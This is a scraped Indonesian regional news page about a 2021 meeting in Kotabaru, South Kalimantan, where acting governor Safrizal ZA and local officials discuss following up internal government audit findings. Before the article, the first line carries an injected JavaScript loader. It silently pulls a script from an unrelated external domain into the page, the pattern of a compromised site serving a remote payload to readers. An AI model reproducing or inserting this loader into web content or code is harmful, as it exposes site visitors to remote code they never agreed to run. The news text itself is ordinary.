(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kotabaru

Pj Gubernur Kalsel Berkomitmen Tingkatkan Kualitas Good Governance


KANALKALIMANTAN.COM, KOTABARU – Rapat Pemutahiran Tindak Lanjut Hasil Pemeriksaan (TLHP) APIP Kalimantan Selatan yang berlangsung di Ballroom Grand Surya di Kotabaru, Senin (28/6/2021).

Kegiatan yang dipimpin langsung pejabat Gubernur Kalsel Safrizal ZA ini juga diikuti kepala daerah dan Inspektur Provinsi, Kabupaten/Kota Kalsel.

Hadir juga adalam kegiatan Inspektur Jenderal Kemendagri Tumpak Haposan Simanjuntak dan Kepala Bagian Analisa dan Evaluasi Hasil Pengawasan Inspektorat Jenderal Kemendagri Maharina Desimaria.

Agenda tahunan ini bertujuan meningkatkan kualitas dan sumberdaya aparat pengawas internal pemerintah yang handal, sehingga bisa bersaing dengan provinsi lainnya di Indonesia.

 

 

Baca juga: GEGER. Video Perempuan Injak-injak Alquran dan Bendera Merah Putih

Pj Gubernur Kalsel Safrizal ZA dalam arahannya mengatakan, secara statistik daerah di Kalsel sudah beberapa kali mendapatkan WTP. Tentunya, prestasi ini harus dipertahankan dengan implementasi dan penguatan sumberdaya aparat pengawas internal pemerintah.

“Semua harus bergerak bersama untuk memajukan dan meningkatkan tata kelola keuangan daerah,” ucapnya.
Jika ini terwujud akan berdampak positif bagi keuangan daerah dan juga negara untuk dimanfaatkan sebesar besarnya bagi kepentingan masyarakat.

“Kita bukan hanya berlomba mendapatkan WTP saja, akan tetapi yang juga penting adalah bagaimana bisa meningkatkan pendapatan daerah/negara untuk dimanfaatkan bagi kesejahteraan rakyat,” tekan gubernur.

Sementara Bupati Kotabaru Sayed Jafar dalam sambutannya, memaparkan, data dan informasi merupakan sumber daya yang sangat strategis. Dalam hal ini karena erat kaitannya dengan pengambilan keputusan dalam menetapkan arah kebijakan dan strategi pembangunan yang tepat.

“Ya, kegiatan pemutahiran data ini dalam rangka koordinasi, komunikasi, evaluasi, dan implementasi masing masing daerah,” ucap Bupati.

Baca juga: Walhi Sebut Program Ketahanan Pangan Sejak Soeharto Kerap Gagal karena Ada Aktor Korporasi

Dikatakan, tindak lanjut hasil pemeriksaan aparat pengawas pemerintah untuk memperbaiki dan menyempurnakan kinerja aparatur dan instansi pemerintah.

Sayed Jafar menambahkan, sebagai Aparat Pengawasan Intern Pemerintah (APIP) harus memiliki kinerja yang lebih baik dalam memperbaiki sistem yang ada untuk meningkatkan sinergitas dengan pengawas eksternal.

Ia pun, berharap dengan adanya acara ini dapat meningkatkan kesadaran dan tanggungjawab pimpinan unit kerja, dan menjadi instansi objek pemeriksaan untuk meningkatkan koordinasi dengan aparat pengawasan dengan objek pemeriksaan. (Kanalkalimantan.com/dewi)

Reporter: dewi
Editor: cell


Risa

Recent Posts

280 Jemaah Haji HSU Dilepas Menuju Asrama Haji

KANALKALIMANTAN.COM, AMUNTAI - Lambaian tangan menyertai keberangkatan 280 jemaah haji Kabupaten Hulu Sungai Utara (HSU)… Read More

24 menit ago

Selewengkan Dana Hibah Kubah, Warga Lampihong Dituntut 15 Bulan Penjara

KANALKALIMANTAN.COM, BANJARMASIN - Jaksa Penuntut Umum (JPU) Kejaksaan Negeri (Kejari) Balangan menyatakan Arbainsyah, terdakwa kasus… Read More

35 menit ago

Garuda Semrawut, Kemenag Geram Penerbangan Haji Delay 17 Jam

KANALKALIMANTAN.COM, JAKARTA - Kementerian Agama (Kemenag) geram dengan cara yang diambil manajemen Garuda Indonesia terkait… Read More

1 jam ago

Temu Kangen Reuni Akbar Alumni SMPN 1 dan SMAN 1 Mandomai

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi hadiri temu kangen reuni akbar… Read More

2 jam ago

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

15 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

17 jam ago

This website uses cookies.